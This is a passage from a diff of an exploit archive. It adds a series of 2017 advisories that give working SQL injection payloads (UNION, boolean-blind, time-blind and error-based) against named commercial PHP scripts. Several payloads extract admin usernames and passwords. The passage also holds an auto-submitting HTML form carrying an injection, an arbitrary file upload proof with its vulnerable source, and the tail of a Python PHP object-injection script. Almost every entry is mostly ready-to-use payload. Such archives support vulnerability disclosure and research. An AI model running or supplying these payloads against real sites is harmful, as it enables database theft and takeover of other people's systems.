'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
|
||||
'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
|
||||
}
|
||||
r = requests.post(url, data=data, headers=headers)
|
||||
|
||||
print r.content
|
||||
|
||||
#------------------------------------
|
40
platforms/php/webapps/43066.txt
Executable file
40
platforms/php/webapps/43066.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
# # # # #
|
||||
# Exploit Title: Zomato Clone Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script
|
||||
# Demo: http://jhinstitute.com/demo/foodpanda/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15993
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL]
|
||||
#
|
||||
# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+-
|
||||
#
|
||||
# Parameter: resid (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
# Payload: resid=-9239 OR 3532=3532#
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: resid=539 AND SLEEP(5)
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: MySQL UNION query (87) - 10 columns
|
||||
# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
36
platforms/php/webapps/43067.txt
Executable file
36
platforms/php/webapps/43067.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
# # # # #
|
||||
# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script
|
||||
# Demo: http://www.officialwebsiteforsale.com/official/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15992
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/status_list.php?status_id=[SQL]
|
||||
#
|
||||
# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+-
|
||||
#
|
||||
# Parameter: status_id (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 5 columns
|
||||
# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
66
platforms/php/webapps/43068.txt
Executable file
66
platforms/php/webapps/43068.txt
Executable file
|
@ -0,0 +1,66 @@
|
|||
# # # # #
|
||||
# Exploit Title: Vastal I-Tech Agent Zone - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://vastal.com/
|
||||
# Software http://vastal.com/agent-zone-real-estate-script.html
|
||||
# Demo: http://agentzone.vastal.com/demo/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15991
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/searchCommercial.php?property_type=[SQL]&city=[SQL]&posted_by=[SQL]
|
||||
#
|
||||
# http://localhost/[PATH]/searchResidential.php?property_type=[SQL]&city=[SQL]&bedroom=[SQL]
|
||||
#
|
||||
# Parameter: city (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
# Payload: property_type=&city=-5275 OR 1703=1703#&posted_by=
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
|
||||
# Payload: property_type=&city=-1769 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (2860=2860) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by=
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
|
||||
# Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by=
|
||||
#
|
||||
# Parameter: posted_by (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
# Payload: property_type=&city=&posted_by=-5550 OR 1335=1335#
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
|
||||
# Payload: property_type=&city=&posted_by=-9423 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (4134=4134) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
|
||||
# Payload: property_type=&city=&posted_by=(CASE WHEN (3754=3754) THEN SLEEP(5) ELSE 3754 END)
|
||||
#
|
||||
# Parameter: property_type (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
|
||||
# Payload: property_type=-8633 OR 6527=6527#&city=&posted_by=
|
||||
#
|
||||
# Type: error-based
|
||||
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
|
||||
# Payload: property_type=-4342 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (3911=3911) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&city=&posted_by=
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
|
||||
# Payload: property_type=(CASE WHEN (2911=2911) THEN SLEEP(5) ELSE 2911 END)&city=&posted_by=
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
53
platforms/php/webapps/43069.txt
Executable file
53
platforms/php/webapps/43069.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
# # # # #
|
||||
# Exploit Title: Php Inventory & Invoice Management System - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://savsofteproducts.com/
|
||||
# Software Link: http://www.phpinventory.com/
|
||||
# Demo: http://phpinventory.com/phpinventory_demo/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15990
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
#
|
||||
# The vulnerability allows an users upload arbitrary file....
|
||||
#
|
||||
# Vulnerable Source:
|
||||
#
|
||||
# .............1
|
||||
# if($_FILES['userfile']['name']!=''){
|
||||
# $target = 'images/user_pics/';
|
||||
# $targets = $target . basename( $_FILES['userfile']['name']);
|
||||
# $docadd=($_FILES['userfile']['name']);
|
||||
# if(move_uploaded_file($_FILES['userfile']['tmp_name'], $targets))
|
||||
# {
|
||||
# $pfilename=$_FILES['userfile']['name'];
|
||||
# $filename=time().$pfilename;
|
||||
# $new_path=$target.$filename;
|
||||
# rename($targets,$new_path);
|
||||
# }
|
||||
#
|
||||
#}else{
|
||||
#$filename=$_POST['user_picname'];
|
||||
#}
|
||||
# .............2,3,4
|
||||
# $target = 'images/logo/';
|
||||
# $target = 'images/product_images/';
|
||||
# $target = 'images/service_providers/';
|
||||
# Etc..
|
||||
# .............
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php/dashboard/edit_myaccountdetail/
|
||||
#
|
||||
# http://localhost/[PATH]/images/user_pics/[...].php
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
40
platforms/php/webapps/43070.txt
Executable file
40
platforms/php/webapps/43070.txt
Executable file
|
@ -0,0 +1,40 @@
|
|||
# # # # #
|
||||
# Exploit Title: Online Exam Test Application - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.exclusivescript.com/product/1z2e4672468/php-scripts/online-exam-test-application
|
||||
# Demo: http://198.38.86.159/~onlineexamboard/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15989
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/resources.php?action=category&sort=[SQL]
|
||||
#
|
||||
# -8++/*!07777UNION*/+/*!07777SELECT*/+0x31,0x32,0x496873616e2053656e63616e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--+-
|
||||
#
|
||||
# Parameter: sort (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: action=category&sort=8 AND 5525=5525
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: action=category&sort=8 AND SLEEP(5)
|
||||
#
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 4 columns
|
||||
# Payload: action=category&sort=8 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x77654f6a51797a6c7755546b54574f68467842734c4268517654667a6e584e63634871574f4f454e,0x716b766a71),NULL-- Yhyw
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
30
platforms/php/webapps/43071.txt
Executable file
30
platforms/php/webapps/43071.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# # # # #
|
||||
# Exploit Title: Nice PHP FAQ Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.nicephpscripts.com/
|
||||
# Software http://www.nicephpscripts.com/demo_php_script-PHP-FAQ-Script-Knowledgebase-Script.htm
|
||||
# Demo: http://www.nicephpscripts.com/scripts/faqscript/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15988
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?nice_theme=[SQL]
|
||||
#
|
||||
# Parameter: nice_theme (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: nice_theme=3 AND 5083=5083
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
49
platforms/php/webapps/43072.txt
Executable file
49
platforms/php/webapps/43072.txt
Executable file
|
@ -0,0 +1,49 @@
|
|||
# # # # #
|
||||
# Exploit Title: Fake Magazine Cover Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.websitescripts.org/
|
||||
# Software Link: http://www.websitescripts.org/website-scripts/fake-magazine-cover-script/prod_81.html
|
||||
# Demo: http://websitescripts.org/demo/magazinecoverscript/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15987
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/rate.php?value=[SQL]
|
||||
#
|
||||
# -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+-
|
||||
#
|
||||
# http://localhost/[PATH]/content.php?id=[SQL]
|
||||
#
|
||||
# -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+-
|
||||
#
|
||||
# Parameter: value (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: value=1047 AND 6465=6465
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: value=1047 AND SLEEP(5)
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: id=237 AND 1343=1343
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: id=237 AND SLEEP(5)
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
29
platforms/php/webapps/43073.txt
Executable file
29
platforms/php/webapps/43073.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
<!--
|
||||
# # # # #
|
||||
# Exploit Title: CPA Lead Reward Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.websitescripts.org/
|
||||
# Software Link: http://www.websitescripts.org/website-scripts/cpa-lead-reward-script-incentive-script-/prod_68.html
|
||||
# Demo: http://www.websitescripts.org/demo/cpaleadrewardscript/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15986
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# # # # #
|
||||
-->
|
||||
<form action="http://localhost/[PATH]/index.php" method="post">
|
||||
<input type="text" name="username" value="' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e202d ,(SELECT (ELT(4=4,1))),VERSiON(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='"/>
|
||||
<input name="password" type="password" value="eFe"/>
|
||||
<input type="Submit" name="login" value="Ver Ayari" />
|
||||
</form>
|
44
platforms/php/webapps/43074.txt
Executable file
44
platforms/php/webapps/43074.txt
Executable file
|
@ -0,0 +1,44 @@
|
|||
# # # # #
|
||||
# Exploit Title: Basic B2B Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.exclusivescript.com/product/nC3F4570353/php-scripts/basic-b2b-script
|
||||
# Demo: http://readymadeb2bscript.com/product/entrepreneur/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15985
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/product_view1.php?pid=[SQL]
|
||||
#
|
||||
# -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+-
|
||||
#
|
||||
# http://localhost/[PATH]/productcompanyinfo.php?id=[SQL]
|
||||
#
|
||||
#
|
||||
# Parameter: pid (GET)
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs
|
||||
#
|
||||
# Parameter: id (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
36
platforms/php/webapps/43075.txt
Executable file
36
platforms/php/webapps/43075.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
# # # # #
|
||||
# Exploit Title: Creative Management System - CMS Lite 1.4 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://bekirk.co.uk/
|
||||
# Software Link: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
|
||||
# Demo: http://demo.bekirk.co.uk/
|
||||
# Version: 1.4
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15984
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?S=[SQL]
|
||||
#
|
||||
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x3a,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))),0)--+-
|
||||
#
|
||||
# Parameter: S (GET)
|
||||
# Type: boolean-based blind
|
||||
# Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
# Payload: S=BeDark' AND 7998=7998 AND 'QNRN'='QNRN
|
||||
#
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
31
platforms/php/webapps/43076.txt
Executable file
31
platforms/php/webapps/43076.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# # # # #
|
||||
# Exploit Title: MyMagazine Magazine & Blog CMS 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://geniusocean.com/
|
||||
# Software Link: https://codecanyon.net/item/mymagazine-bootstrap-newspaper-magazine-and-blog-cms-script/19620468
|
||||
# Demo: http://demo.geniusocean.com/mymagazine/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15983
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
|
||||
#
|
||||
# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
|
||||
#
|
||||
# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
31
platforms/php/webapps/43077.txt
Executable file
31
platforms/php/webapps/43077.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# # # # #
|
||||
# Exploit Title: News Magazine & Blog CMS 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://geniusocean.com/
|
||||
# Software Link: https://codecanyon.net/item/news-dynamic-newspaper-magazine-and-blog-cms-script/19656143
|
||||
# Demo: http://demo.geniusocean.com/news/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15982
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
|
||||
#
|
||||
# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
|
||||
#
|
||||
# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
31
platforms/php/webapps/43078.txt
Executable file
31
platforms/php/webapps/43078.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
# # # # #
|
||||
# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://geniusocean.com/
|
||||
# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325
|
||||
# Demo: http://demo.geniusocean.com/newspaper/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15981
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL]
|
||||
#
|
||||
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
|
||||
#
|
||||
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+-
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
32
platforms/php/webapps/43079.txt
Executable file
32
platforms/php/webapps/43079.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
# # # # #
|
||||
# Exploit Title: US Zip Codes Database Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://rowindex.com/
|
||||
# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script
|
||||
# Demo: http://rowindex.com/demo/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15980
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL]
|
||||
#
|
||||
# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
|
||||
#
|
||||
# Parameter: state (GET)
|
||||
# Type: UNION query
|
||||
# Title: Generic UNION query (NULL) - 1 column
|
||||
# Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
30
platforms/php/webapps/43080.txt
Executable file
30
platforms/php/webapps/43080.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# # # # #
|
||||
# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: https://odallated.com/
|
||||
# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network
|
||||
# Demo: https://odallated.com/shareet/demo/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-15979
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/?photo=[SQL]
|
||||
#
|
||||
# Parameter: photo (GET)
|
||||
# Type: AND/OR time-based blind
|
||||
# Title: MySQL >= 5.0.12 AND time-based blind
|
||||
# Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
36
platforms/php/webapps/43081.txt
Executable file
36
platforms/php/webapps/43081.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
# # # # #
|
||||
# Exploit Title: AROX School ERP PHP Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.10.2017
|
||||
# Vendor Homepage: http://arox.in/
|
||||
